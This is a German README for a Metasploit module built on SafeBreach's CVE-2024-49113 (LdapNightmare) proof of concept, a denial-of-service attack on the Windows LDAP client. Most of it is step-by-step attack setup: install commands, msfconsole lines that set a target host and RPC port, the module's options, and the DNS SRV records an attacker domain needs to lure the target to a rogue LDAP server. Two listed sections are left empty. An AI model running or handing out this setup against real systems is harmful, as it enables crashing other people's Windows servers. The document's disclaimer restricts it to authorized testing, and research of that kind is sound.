
SafeBreaches CVE-2024-49113 POC (LdapNightmare) integriert in Metasploit
SafeBreaches CVE-2024-49113 POC (LdapNightmare) in Metasploit integriert
Dieses Modul implementiert CVE-2024-49113, eine kritische Schwachstelle im Windows LDAP-Client, die zu Systeminstabilität führen kann. Das Modul ist in das Metasploit Framework integriert und bietet eine zuverlässige Möglichkeit, die Systemresistenz gegen diese Schwachstelle zu testen.
ldaptor
impacket
Installieren Sie die erforderlichen Python-Pakete:
pip install -r requirements.txt
Platzieren Sie das Modul in Ihrem Metasploit-Modulverzeichnis:
cp ldapnightmare.py /path/to/metasploit/modules/auxiliary/dos/windows/ldap/
Stellen Sie sicher, dass das Modul ausführbar ist:
chmod +x ldapnightmare.py
Starten Sie msfconsole:
msfconsole
Laden und konfigurieren Sie das Modul:
use auxiliary/dos/windows/ldap/ldapnightmare
set RHOSTS target_ip
set RPORT 49664
set LPORT 389
set DOMAINNAME yourdomain.com
run
RHOSTS - Zieladresse (erforderlich)RPORT - Zielport für RPC (Standard: 49664)LPORT - Lokaler Port für LDAP-Server (Standard: 389)DOMAINNAME - Domainname des Angreifers (erforderlich). Diese Domain muss bestimmte DNS-SRV-Einträge konfiguriert haben (siehe Domain-Konfiguration unten)ACCOUNT - Zielkontoname (Standard: Administrator)SITENAME - Zielstandortname (Standard: leer)Der Parameter DOMAINNAME erfordert die Konfiguration spezifischer DNS-SRV-Einträge. Die Domain muss zwei SRV-Einträge unter sich haben:
ldap.tcp.dc._msdcs.domain_name → listen_port attacker's_machine_hostnameldap.tcp.default-first-site-name._sites.dc._msdcs.domain_name → listen_port attacker's_machine_hostnameWichtiger Hinweis: Der Hostname des Angreifer-Rechners funktioniert nur, wenn der Zielserver ihn über NBNS auflösen kann. Alternativ können Sie den Hostnamen durch einen Domainnamen ersetzen, der auf die IP-Adresse Ihres LDAP-Servers verweist.
Das Modul arbeitet in drei Hauptphasen:
Dieses Modul ist ausschließlich für autorisierte Sicherheitstests und Forschungszwecke bestimmt. Benutzer müssen eine ordnungsgemäße Genehmigung einholen, bevor sie Systeme testen, die sie nicht besitzen oder für die sie keine Testberechtigung haben.
Dieses Modul wird unter der BSD 3-Clause-Lizenz veröffentlicht.
Diese Arbeit enthält Code, der abgeleitet ist von:
Vollständige Lizenztexte finden Sie in der Datei LICENSES.